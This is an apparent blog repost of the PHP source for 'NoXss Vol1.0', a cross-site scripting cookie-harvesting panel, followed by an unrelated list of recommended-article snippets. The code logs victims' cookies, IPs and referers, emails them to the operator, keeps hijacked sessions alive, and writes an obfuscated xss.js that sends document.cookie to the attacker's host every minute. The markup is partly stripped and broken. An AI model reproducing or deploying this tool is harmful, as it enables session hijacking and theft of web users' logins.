weixin_30418341
weixin_30418341

NoXss Vol1.0

Date : '.$xss_date.'

		
IP : '.$xss_ip.'

		
Location : '.$xss_location.'

		
Referer : '.$xss_referer.'

		
Cookie : '.$xss_cookie.'

		
Hash : '.md5($xss_ip).'

		
NoXss : '.$shell.'

	';
	AppSendMail('A Xss Info Had Got!' ,$contents);
}
else if (isset($_GET['session']))
{
	// KEEP SESSION
	$xss_cookie = $_GET['session']; 
	AppKeepSession($xss_ip); 
}
else if ($_GET['act'] == 'js')
{
	// RECREATE XSS.JS
	if (AppCheck($password)) AppCreateJs(); 
}
else if ($_GET['act'] == 'view')
{
	// VIEW NOC LIST
	if (AppCheck($password)) AppReadNox(); 
}
else if ($_GET['act'] == 'del')
{
	// DELETE NOC FILE
	if (AppCheck($password)) AppDelNox(); 
}
else
{
	// CHECK LOGIN
	if (AppCheck($password)) AppViewXss();
}

// CHECK LOGIN
function AppCheck($_p)
{
	$pwd = $_GET['pass'];
	if (md5(md5($pwd)) != $_p)
	{
		echo 'Fuck You!';
	}
	else
	{
		return true;
	}
}

// SAVE XSS
function AppSaveXss($_h, $_d, $_i, $_l, $_r, $_c)
{
	$fp = fopen('./cookie/'.date("Y-m-d-H-i-s").'.noc', 'a'); 
	fwrite($fp, $_h."\r\n");
	fwrite($fp, 'Date: '.$_d."\r\n");
	fwrite($fp, 'IP: '.$_i."\r\n");
	fwrite($fp, 'Location: '.$_l."\r\n");
	fwrite($fp, 'Referer: '.$_r."\r\n");		
	fwrite($fp, 'Cookie: '.$_c);
	fclose($fp);
}

// SEND MAIL 
function AppSendMail($_t, $_c)
{
	global $smtpserver;
	global $smtpserverport;
	global $smtpusermail;
	global $smtpemailto;
	global $smtpuser;
	global $smtppass;

	$smtp = new smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
	$smtp->debug = FALSE;
	$smtp->sendmail($smtpemailto, $smtpusermail, $_t, $_c, 'HTML');
}

// VIEW OUTPUT
function AppViewXss()
{
	global $smtpusermail;
	global $smtpemailto;
	
	// OUTPUT HEADER
	print_r('
	
	
	NoXss
	
	
	
	');

	print_r('
    ');
	
	// OUTPUT SIMPLE INFO
	global $path;
	$noc = AppGetNox('cookie');
	
	print_r('
	
  • NoXss
    • 
	
  • 
	Date: '.date('Y/m/d H:i:s').' 
	Host: '.$_SERVER['HTTP_HOST'].' ('.gethostbyname($_SERVER['SERVER_NAME']).') 
	Count: '.count($noc).' 
	
    • 
	
  • 
	SEND USER: '.$smtpusermail.' 
	SEND TO: '.$smtpemailto.' 
	
    • 
	
  • Use Example:  
	[Creat Js]
    • 
	');
	
	// OUTPUT TABLE HEADER
	print_r('
	
  • 
		
	');
	
	// OUTPUT NOC LIST
	for ($i=count($noc)-1; $i>=0; $i--)
	{
		// READ NOC FILE
		$nocfile = file('./cookie/'.$noc[$i].'.noc');
		$j = 0;
		foreach($nocfile as &$line)
		{
			$nocdata[$j] = $line;
			$j++;
		}
	
		print_r('
		
		');
	}
	
	// OUTPUT FOOTER
	print_r('
	
    
	
    
	Name
	Date
	Ip 
	Referer
	Status
	Action
	
    
		['.$noc[$i].']
		'.$nocdata[1].'
		'.$nocdata[2].'
		'.AppSubStr($nocdata[4], 0, 55).'
		'.AppCheckStatus($nocdata[0]).'
		[
		
		View | 
		
		Delete
		]
		
    • 
	
  • Code By : NoevilSparrow @:[email protected] Version: 1.0
    • 
	

	');
}

// KEEP SESSION
function AppKeepSession($_c)
{
	$session_hash = md5($_c);
	
	// CLEAN SESSION
	if (!is_dir('session/'.date('YmdH')))
	{
		// CREATE FOLDER AND DELETE OTHERS
		mkdir('session/'.date('YmdH'));
		$handle = @opendir('./session/');
		for ($i=0; $dir = @readdir($handle); $i++)
		{ 
			if (@is_dir('./session/'.$dir) && $dir!='.' && $dir!='..')
			{
				if ($dir != date('YmdH'))
				{
					AppCleanSession('./session/'.$dir);
				}
			}				
		} 
		closedir($handle);
	}
	
	// RECORD SESSION
	if (!file_exists('./session/'.date('YmdH').'/'.$session_hash.'.nos'))
	{
		$fp = fopen('./session/'.date('YmdH').'/'.$session_hash.'.nos', 'a'); 
		fwrite($fp, $session_hash);
		fclose($fp);
	}
	
}

// CLEAN SESSION
function AppCleanSession($_d) 
{
	$dh = opendir($_d);
	while ($file = readdir($dh)) 
	{
		if($file!='.' && $file!='..') 
		{
			$fullpath =	$_d.'/'.$file;
			if(!is_dir($fullpath)) 
			{
				unlink($fullpath);
			} 
			else 
			{
				AppCleanSession($fullpath);
			}
		}
	}
	closedir($dh);
	
	if(rmdir($_d)) 
	{
		return true;
	} 
	else 
	{
		return false;
	}
}

// CHECK STATUS
function AppCheckStatus($_h)
{
	$_h = trim($_h);
	if (file_exists('./session/'.date('YmdH').'/'.$_h.'.nos'))
	{
		return 'Keeping';
	}
	else
	{
		return 'Lost';
	}
}

// READ NOC LIST
function AppGetNox($_p)
{
	if (is_dir($_p))
    {
        if ($handle = opendir($_p))
        {
			for ($i=0; ($file = readdir($handle)) !== false; )
            {
                if($file != "." && $file != ".." && $file != "Thumbs.db")
                {
					$temp = explode('.',$file);
					$_r[$i]	= $temp[0];
					$i++;
                }
            }
            closedir($handle);
        }
    }
	
	return $_r;
}

// DOWNLOAD MAIL CLASS
function AppGetClass($_u)
{         
	$file = fopen ($_u, 'rb');         
	if ($file) 
	{         
		$fp = fopen('mail.php', 'wb');         
		if ($fp)         
		while(!feof($file)) 
		{         
			fwrite($fp, fread($file, 1024*8 ), 1024*8);         
		}         
	}         
	if ($file) 
	{         
		fclose($file);         
	}         
	if ($fp) 
	{         
		fclose($fp);
	}
}

// RE CREATE XSS.JS
function AppCreateJs()
{
	global $shell;
	$fp = fopen('xss.js', 'w'); 
	fwrite($fp, 'var _u = "http://'.$shell.'";');
	fwrite($fp, 'eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'1 6="3="+9(b.3)+"&8="+l.8;1 i="m="+9(b.3);1 0=a 7();1 2=a 7();5();e();4 5(){0.c("j",k+"?"+6,g);0.h(d);p 0}4 f(){2.c("j",k+"?"+i,g);2.h(d)}4 e(){n.q("f()",o)}\',27,27,\'_hc|var|_hs|cookie|function|C|_c|XMLHttpRequest|location|escape|new|document|open|null|K|S|true|send|_s|GET|_u|top|session|window|60000|delete|setInterval\'.split(\'|\'),0,{}))
	');
	fclose($fp);
	print_r('');
	
}

// STRING SUB
function AppSubStr($_s, $_f, $_l = null)
{
    preg_match_all('/./u', $_s, $match);
    $strlength = count($match[0]);

    if (is_null($_l) || $strlength < $_l) 
	{
        $result = implode('', array_slice($match[0], $_f));
    } 
	else 
	{
        $result = implode('', array_slice($match[0], $_f, $_l)).'...';
    }
    return $result;
}

// READ NOC FILE
function AppReadNox()
{	
	$nocfile = file('./cookie/'.$_GET['noc'].'.noc');
	foreach($nocfile as &$line)
	{
		print_r($line.'
');
	}
}

// DELETE NOC FILE
function AppDelNox()
{
	if (!unlink('./cookie/'.$_GET['noc'].'.noc'))
	{
		print_r('');
	}
	else
	{
		print_r('');
	}
}

?>

  

转载于:https://www.cnblogs.com/noevil/archive/2011/08/11/2134372.html

你可能感兴趣的:(NoXss Vol1.0)

  • 【进阶】Unity资源解决方案之AssetBundle woerxi
    作者:michellwei2015-04-29浏览(1642)评论(2)前阵子研究了一下Untiy的AssetBundle,把相关的一些知识点整理跟大家分享一下。1、什么是AssetBundleAssetBundle是Unitypro提供的一种用来存储资源的文件格式,它可以存储任意一种Unity引擎能够识别的资源,如Scene、Mesh、Material、Texture、Audio、noxss等等
  • NoXss Vol1.0 weixin_30418341
    Date:'.$xss_date.'IP:'.$xss_ip.'Location:'.$xss_location.'Referer:'.$xss_referer.'Cookie:'.$xss_cookie.'Hash:'.md5($xss_ip).'NoXss:'.$shell.'';AppSendMail('AXssInfoHadGot!',$contents);}elseif(isset($_
  • 【转帖】一款优秀的XSS批量检测工具 济南小老虎
    一款优秀的XSS批量检测工具https://www.freebuf.com/sectool/223009.html必须学习胶水语言才可以啊至少学会代码的编写与使用。0×01简介NoXss是一个供web安全工程师批量检测xss隐患的脚本工具。其主要用于批量检测,比如甲方内部安全巡检,人工分析千万级的url资产是不现实的,NoXss使用多进程+协程的方式,支持高并发,可以出色的完成这一任务。NoXss
  • Unity3d资源解决方案之AssetBundle 好怕怕
    1、什么是AssetBundleAssetBundle是Unitypro提供的一种用来存储资源的文件格式,它可以存储任意一种Unity引擎能够识别的资源,如Scene、Mesh、Material、Texture、Audio、noxss等等,同时,AssetBundle也可以包含开发者自定义的二进制文件,只需要将自定义文件的扩展名改为.bytes,Unity就可以把它识别为TextAsset,进而就
  • java的(PO,VO,TO,BO,DAO,POJO) Cb123456 VOTOBOPOJODAO
    转: http://www.cnblogs.com/yxnchinahlj/archive/2012/02/24/2366110.html   -------------------------------------------------------------------  O/R Mapping 是 Object Relational Mapping(对象关系映
  • spring ioc原理(看完后大家可以自己写一个spring) aijuans spring
             最近,买了本Spring入门书:spring In Action 。大致浏览了下感觉还不错。就是入门了点。Manning的书还是不错的,我虽然不像哪些只看Manning书的人那样专注于Manning,但怀着崇敬 的心情和激情通览了一遍。又一次接受了IOC 、DI、AOP等Spring核心概念。 先就IOC和DI谈一点我的看法。IO
  • MyEclipse 2014中Customize Persperctive设置无效的解决方法 Kai_Ge MyEclipse2014
    高高兴兴下载个MyEclipse2014,发现工具条上多了个手机开发的按钮,心生不爽就想弄掉他! 结果发现Customize Persperctive失效!! 有说更新下就好了,可是国内Myeclipse访问不了,何谈更新... so~这里提供了更新后的一下jar包,给大家使用! 1、将9个jar复制到myeclipse安装目录\plugins中 2、删除和这9个jar同包名但是版本号较
  • SpringMvc上传 120153216 springMVC
      @RequestMapping(value = WebUrlConstant.UPLOADFILE) @ResponseBody public Map<String, Object> uploadFile(HttpServletRequest request,HttpServletResponse httpresponse) { try { //
  • Javascript----HTML DOM 事件 何必如此 JavaScripthtmlWeb
    HTML DOM 事件允许Javascript在HTML文档元素中注册不同事件处理程序。 事件通常与函数结合使用,函数不会在事件发生前被执行! 注:DOM: 指明使用的 DOM 属性级别。 1.鼠标事件 属性               
  • 动态绑定和删除onclick事件 357029540 JavaScriptjquery
    因为对JQUERY和JS的动态绑定事件的不熟悉,今天花了好久的时间才把动态绑定和删除onclick事件搞定!现在分享下我的过程。      在我的查询页面,我将我的onclick事件绑定到了tr标签上同时传入当前行(this值)参数,这样可以在点击行上的任意地方时可以选中checkbox,但是在我的某一列上也有一个onclick事件是用于下载附件的,当
  • HttpClient|HttpClient请求详解 7454103 apache应用服务器网络协议网络应用Security
    HttpClient 是 Apache Jakarta Common 下的子项目,可以用来提供高效的、最新的、功能丰富的支持 HTTP 协议的客户端编程工具包,并且它支持 HTTP 协议最新的版本和建议。本文首先介绍 HTTPClient,然后根据作者实际工作经验给出了一些常见问题的解决方法。HTTP 协议可能是现在 Internet 上使用得最多、最重要的协议了,越来越多的 Java 应用程序需
  • 递归 逐层统计树形结构数据 darkranger 数据结构
    将集合递归获取树形结构: /** * * 递归获取数据 * @param alist:所有分类 * @param subjname:对应统计的项目名称 * @param pk:对应项目主键 * @param reportList: 最后统计的结果集 * @param count:项目级别 */ public void getReportVO(Arr
  • 访问WEB-INF下使用frameset标签页面出错的原因 aijuans struts2
    <frameset rows="61,*,24" cols="*" framespacing="0" frameborder="no" border="0">        
  • MAVEN常用命令 avords
    Maven库: http://repo2.maven.org/maven2/ Maven依赖查询: http://mvnrepository.com/ Maven常用命令: 1. 创建Maven的普通java项目:    mvn archetype:create    -DgroupId=packageName 
  • PHP如果自带一个小型的web服务器就好了 houxinyou apache应用服务器WebPHP脚本
    最近单位用PHP做网站,感觉PHP挺好的,不过有一些地方不太习惯,比如,环境搭建。PHP本身就是一个网站后台脚本,但用PHP做程序时还要下载apache,配置起来也不太很方便,虽然有好多配置好的apache+php+mysq的环境,但用起来总是心里不太舒服,因为我要的只是一个开发环境,如果是真实的运行环境,下个apahe也无所谓,但只是一个开发环境,总有一种杀鸡用牛刀的感觉。如果php自己的程序中
  • NoSQL数据库之Redis数据库管理(list类型) bijian1013 redis数据库NoSQL
    3.list类型及操作         List是一个链表结构,主要功能是push、pop、获取一个范围的所有值等等,操作key理解为链表的名字。Redis的list类型其实就是一个每个子元素都是string类型的双向链表。我们可以通过push、pop操作从链表的头部或者尾部添加删除元素,这样list既可以作为栈,又可以作为队列。   &nbs
  • 谁在用Hadoop? bingyingao hadoop数据挖掘公司应用场景
    Hadoop技术的应用已经十分广泛了,而我是最近才开始对它有所了解,它在大数据领域的出色表现也让我产生了兴趣。浏览了他的官网,其中有一个页面专门介绍目前世界上有哪些公司在用Hadoop,这些公司涵盖各行各业,不乏一些大公司如alibaba,ebay,amazon,google,facebook,adobe等,主要用于日志分析、数据挖掘、机器学习、构建索引、业务报表等场景,这更加激发了学习它的热情。
  • 【Spark七十六】Spark计算结果存到MySQL bit1129 mysql
    package spark.examples.db import java.sql.{PreparedStatement, Connection, DriverManager} import com.mysql.jdbc.Driver import org.apache.spark.{SparkContext, SparkConf} object SparkMySQLInteg
  • Scala: JVM上的函数编程 bookjovi scalaerlanghaskell
        说Scala是JVM上的函数编程一点也不为过,Scala把面向对象和函数型编程这两种主流编程范式结合了起来,对于熟悉各种编程范式的人而言Scala并没有带来太多革新的编程思想,scala主要的有点在于Java庞大的package优势,这样也就弥补了JVM平台上函数型编程的缺失,MS家.net上已经有了F#,JVM怎么能不跟上呢?     对本人而言
  • jar打成exe bro_feng java jar exe
    今天要把jar包打成exe,jsmooth和exe4j都用了。 遇见几个问题。记录一下。 两个软件都很好使,网上都有图片教程,都挺不错。 首先肯定是要用自己的jre的,不然不能通用,其次别忘了把需要的lib放到classPath中。 困扰我很久的一个问题是,我自己打包成功后,在一个同事的没有装jdk的电脑上运行,就是不行,报错jvm.dll为无效的windows映像,如截图 最后发现
  • 读《研磨设计模式》-代码笔记-策略模式-Strategy bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* 策略模式定义了一系列的算法,并将每一个算法封装起来,而且使它们还可以相互替换。策略模式让算法独立于使用它的客户而独立变化 简单理解: 1、将不同的策略提炼出一个共同接口。这是容易的,因为不同的策略,只是算法不同,需要传递的参数
  • cmd命令值cvfM命令 chenyu19891124 cmd
         cmd命令还真是强大啊。今天发现jar -cvfM aa.rar @aaalist 就这行命令可以根据aaalist取出相应的文件   例如:      在d:\workspace\prpall\test.java 有这样一个文件,现在想要将这个文件打成一个包。运行如下命令即可比如在d:\wor
  • OpenJWeb(1.8) Java Web应用快速开发平台 comsci java框架Web项目管理企业应用
        OpenJWeb(1.8) Java Web应用快速开发平台的作者是我们技术联盟的成员,他最近推出了新版本的快速应用开发平台  OpenJWeb(1.8),我帮他做做宣传   OpenJWeb快速开发平台以快速开发为核心,整合先进的java 开源框架,本着自主开发+应用集成相结合的原则,旨在为政府、企事业单位、软件公司等平台用户提供一个架构透
  • Python 报错:IndentationError: unexpected indent daizj pythontab空格缩进
        IndentationError: unexpected indent 是缩进的问题,也有可能是tab和空格混用啦     Python开发者有意让违反了缩进规则的程序不能通过编译,以此来强制程序员养成良好的编程习惯。并且在Python语言里,缩进而非花括号或者某种关键字,被用于表示语句块的开始和退出。增加缩进表示语句块的开
  • HttpClient 超时设置 dongwei_6688 httpclient
    HttpClient中的超时设置包含两个部分: 1. 建立连接超时,是指在httpclient客户端和服务器端建立连接过程中允许的最大等待时间 2. 读取数据超时,是指在建立连接后,等待读取服务器端的响应数据时允许的最大等待时间   在HttpClient 4.x中如下设置:   HttpClient httpclient = new DefaultHttpC
  • 小鱼与波浪 dcj3sjt126com
    一条小鱼游出水面看蓝天,偶然间遇到了波浪。  小鱼便与波浪在海面上游戏,随着波浪上下起伏、汹涌前进。  小鱼在波浪里兴奋得大叫:“你每天都过着这么刺激的生活吗?简直太棒了。”  波浪说:“岂只每天过这样的生活,几乎每一刻都这么刺激!还有更刺激的,要有潮汐变化,或者狂风暴雨,那才是兴奋得心脏都会跳出来。”  小鱼说:“真希望我也能变成一个波浪,每天随着风雨、潮汐流动,不知道有多么好!”  很快,小鱼
  • Error Code: 1175 You are using safe update mode and you tried to update a table dcj3sjt126com mysql
    快速高效用:SET SQL_SAFE_UPDATES = 0;下面的就不要看了! 今日用MySQL Workbench进行数据库的管理更新时,执行一个更新的语句碰到以下错误提示: Error Code: 1175 You are using safe update mode and you tried to update a table without a WHERE that
  • 枚举类型详细介绍及方法定义 gaomysion enumjavaee
    转发 http://developer.51cto.com/art/201107/275031.htm 枚举其实就是一种类型,跟int, char 这种差不多,就是定义变量时限制输入的,你只能够赋enum里面规定的值。建议大家可以看看,这两篇文章,《java枚举类型入门》和《C++的中的结构体和枚举》,供大家参考。 枚举类型是JDK5.0的新特征。Sun引进了一个全新的关键字enum
  • Merge Sorted Array hcx2013 array
    Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array. Note:You may assume that nums1 has enough space (size that is
  • Expression Language 3.0新特性 jinnianshilongnian el 3.0
    Expression Language 3.0表达式语言规范最终版从2013-4-29发布到现在已经非常久的时间了;目前如Tomcat 8、Jetty 9、GlasshFish 4已经支持EL 3.0。新特性包括:如字符串拼接操作符、赋值、分号操作符、对象方法调用、Lambda表达式、静态字段/方法调用、构造器调用、Java8集合操作。目前Glassfish 4/Jetty实现最好,对大多数新特性
  • 超越算法来看待个性化推荐 liyonghui160com 超越算法来看待个性化推荐
             一提到个性化推荐,大家一般会想到协同过滤、文本相似等推荐算法,或是更高阶的模型推荐算法,百度的张栋说过,推荐40%取决于UI、30%取决于数据、20%取决于背景知识,虽然本人不是很认同这种比例,但推荐系统中,推荐算法起的作用起的作用是非常有限的。       就像任何
  • 写给Javascript初学者的小小建议 pda158 JavaScript
      一般初学JavaScript的时候最头痛的就是浏览器兼容问题。在Firefox下面好好的代码放到IE就不能显示了,又或者是在IE能正常显示的代码在firefox又报错了。   如果你正初学JavaScript并有着一样的处境的话建议你:初学JavaScript的时候无视DOM和BOM的兼容性,将更多的时间花在 了解语言本身(ECMAScript)。只在特定浏览器编写代码(Chrome/Fi
  • Java 枚举 ShihLei javaenum枚举
    注:文章内容大量借鉴使用网上的资料,可惜没有记录参考地址,只能再传对作者说声抱歉并表示感谢!   一 基础 1)语法      枚举类型只能有私有构造器(这样做可以保证客户代码没有办法新建一个enum的实例)      枚举实例必须最先定义 2)特性     &nb
  • Java SE 6 HotSpot虚拟机的垃圾回收机制 uuhorse javaHotSpotGC垃圾回收VM
    官方资料,关于Java SE 6 HotSpot虚拟机的garbage Collection,非常全,英文。 http://www.oracle.com/technetwork/java/javase/gc-tuning-6-140523.html   Java SE 6 HotSpot[tm] Virtual Machine Garbage Collection Tuning &
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他